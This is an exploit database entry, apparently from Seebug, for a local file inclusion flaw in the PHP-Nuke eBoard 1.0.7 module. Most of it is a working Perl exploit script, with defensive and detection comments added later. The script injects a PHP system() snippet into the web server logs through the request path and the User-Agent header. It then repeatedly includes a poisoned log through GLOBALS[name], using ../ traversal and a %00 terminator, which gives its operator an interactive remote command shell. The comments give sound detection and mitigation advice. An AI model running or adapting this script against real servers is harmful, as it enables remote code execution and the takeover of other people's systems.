PHP-Nuke Module eBoard 1.0.7 GLOBALS[name] LFI Exploit

2007-04-10T00:00:00
ID SSV:6604
Type seebug
Reporter Root
Modified 2007-04-10T00:00:00

Description

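No description provided by source. Judging from the listing below, the eBoard 1.0.7 module for PHP-Nuke appears to let a request-supplied GLOBALS[name] value reach a file include in member.php, so a local file such as a web-server log can be included and any PHP text it contains executed. Requests to member.php that carry GLOBALS[name] together with ../ sequences or a trailing %00 are the indicator to look for, and web-server logs should sit outside any path the PHP process is allowed to include.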

                                        
                                            
                                                #!Perl
#
#PHP-Nuke Module eBoard 1.0.7 GLOBALS[name] Local File Inclusion Exploit
#
#Vendor: http://www.complex-berlin.de/modules.php?name=Downloads&d_op=getit&lid=975
#
#
#Coded by bd0rk || SOH-Crew
#
#Greetz: str0ke, TheJT, MereX, mymaster
#

use IO::Socket;
use LWP::Simple;

#ripped

# Candidate locations of web-server access and error logs, written as
# relative directory-traversal paths. A single entry is picked later in the
# script via $apache[$apachepath] and sent as the GLOBALS[name] value.
# Defender note: every entry points at a log file, so the technique depends on
# the PHP process being able to read and include the server logs. Keeping logs
# unreadable by the web application user, or restricting includes with
# open_basedir, removes that precondition.
# Detection note: these path fragments combined with ../ sequences in a query
# string are usable as a match list for request logs or WAF rules.
@apache=(
\"../../../../../var/log/httpd/access_log\",
\"../../../../../var/log/httpd/error_log\",
\"../apache/logs/error.log\",
\"../apache/logs/access.log\",
\"../../apache/logs/error.log\",
\"../../apache/logs/access.log\",
\"../../../apache/logs/error.log\",
\"../../../apache/logs/access.log\",
\"../../../../apache/logs/error.log\",
\"../../../../apache/logs/access.log\",
\"../../../../../apache/logs/error.log\",
\"../../../../../apache/logs/access.log\",
\"../logs/error.log\",
\"../logs/access.log\",
\"../../logs/error.log\",
\"../../logs/access.log\",
\"../../../logs/error.log\",
\"../../../logs/access.log\",
\"../../../../logs/error.log\",
\"../../../../logs/access.log\",
\"../../../../../logs/error.log\",
\"../../../../../logs/access.log\",
\"../../../../../etc/httpd/logs/access_log\",
\"../../../../../etc/httpd/logs/access.log\",
\"../../../../../etc/httpd/logs/error_log\",
\"../../../../../etc/httpd/logs/error.log\",
\"../../.. /../../var/www/logs/access_log\",
\"../../../../../var/www/logs/access.log\",
\"../../../../../usr/local/apache/logs/access_log\",
\"../../../../../usr/local/apache/logs/access.log\",
\"../../../../../var/log/apache/access_log\",
\"../../../../../var/log/apache/access.log\",
\"../../../../../var/log/access_log\",
\"../../../../../var/www/logs/error_log\",
\"../../../../../var/www/logs/error.log\",
\"../../../../../usr/local/apache/logs/error_log\",
\"../../../../../usr/local/apache/logs/error.log\",
\"../../../../../var/log/apache/error_log\",
\"../../../../../var/log/apache/error.log\",
\"../../../../../var/log/access_log\",
\"../../../../../var/log/error_log\"
);

# Argument guard: with fewer than three command-line arguments the script
# prints its banner and usage text, then exits without any network activity.
if (@ARGV < 3) {
print \"
PHP-Nuke Module eBoard 1.0.7 GLOBALS[name] Local File Inclusion Exploit
###############################################################
Usage: exploit.pl [victim] /modules/eBoard/ [apachepath]
###############################################################
\";
exit();
}

# Positional arguments, stored as package globals (no strict, no my).
# $host       - name or address handed to IO::Socket::INET as PeerAddr
# $path       - URL prefix of the module, concatenated directly into request lines
# $apachepath - subscript used on @apache when the include request is built
# None of the three values is validated before use.
$host=$ARGV[0];
$path=$ARGV[1];
$apachepath=$ARGV[2];

# Stage one, log poisoning: a single HTTP request is sent whose request path
# and user-Agent header both carry a PHP snippet, so that the web server
# records the snippet in its own log files.
# Detection note: access or error log entries whose request URI or User-Agent
# field contains a PHP open tag are a strong indicator of this stage. Alerting
# on that pattern catches the attempt before any include request is made.
print \"Code is injecting in logfiles...
\";
# The snippet clears the output buffer, hands a client-supplied cmd value to
# the PHP system() call, and then stops the script with die.
$CODE=\"<?php ob_clean();system($HTTP_COOKIE_VARS[cmd]);die;?>\";
$socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$host\", PeerPort=>\"80\") or die \"Connection failed.

\";
print $socket \"GET \".$path.$CODE.\" HTTP/1.1
\";
print $socket \"user-Agent: \".$CODE.\"
\";
print $socket \"Host: \".$host.\"
\";
print $socket \"Connection: close

\";
# The connection is closed without reading the reply; only the side effect of
# the request being logged matters to this stage.
close($socket);
print \"Write END to exit!
\";
print \"If not working try another apache path

\";

# Stage two, include loop: reads a line from STDIN, and for every line that
# does not match END opens a new TCP connection to port 80, sends one request
# to member.php, prints the raw response, and prompts again.
# Detection note: the request shape is distinctive. It targets member.php under
# the module path with a GLOBALS[name] parameter holding ../ sequences and a
# log file name, followed by %00 and a cmd parameter.
# Mitigation note: the request relies on a client being able to set
# GLOBALS[name] and on %00 cutting off whatever the application appends to the
# path (presumably a file extension; the vulnerable code is not shown here).
# Rejecting GLOBALS keys in request input, validating the included name against
# a fixed list, and running a PHP release that refuses NUL bytes in paths each
# break the chain.
print \"[shell] \";$cmd = <STDIN>;

while($cmd !~ \"END\") {
$socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$host\", PeerPort=>\"80\") or die \"Connection failed.

\";

# Include request: GLOBALS[name] is set to the @apache entry selected by
# $apachepath, followed by %00, with the operator input passed as cmd.

print $socket \"GET \".$path.\"member.php?GLOBALS[name]=\".$apache[$apachepath].\"%00&cmd=$cmd HTTP/1.1
\";
print $socket \"Host: \".$host.\"
\";
print $socket \"Accept: */*
\";
print $socket \"Connection: close

\";

# Echo the whole HTTP response, headers included, line by line
# (raspuns is Romanian for response).
while ($raspuns = <$socket>)
{

print $raspuns;
}

print \"[shell] \";
$cmd = <STDIN>;
}